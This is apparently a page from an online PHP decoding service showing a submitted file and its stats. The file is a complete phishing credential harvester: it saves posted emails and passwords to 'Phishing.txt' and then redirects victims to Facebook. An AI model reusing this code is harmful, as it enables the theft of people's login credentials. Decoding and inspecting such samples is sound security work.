Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php if(isset($_POST['email']) && isset($_POST['pass'])){ file_put_contents("Phis..

Decoded Output download

<script>window.location.href=index.html</script>

Did this file decode correctly?

Original Code

<?php 

if(isset($_POST['email']) && isset($_POST['pass'])){
			file_put_contents("Phishing.txt", " ######################################################### "."\n", FILE_APPEND);
			file_put_contents("Phishing.txt", " # Email : ".$_POST['email']."|| Password : ".$_POST['pass']."\n", FILE_APPEND);
			file_put_contents("Phishing.txt", " ######################################################### "."\n", FILE_APPEND);

			echo "<script> window.location.href='https://wwww.facebook.com'</script>" 	;
	} 
else 
			echo "<script>window.location.href=index.html</script>" ;
?> 

Function Calls

None

Variables

None

Stats

MD5 e74d9e60c9a987f9d628869ad9b748e1
Eval Count 0
Decode Time 96 ms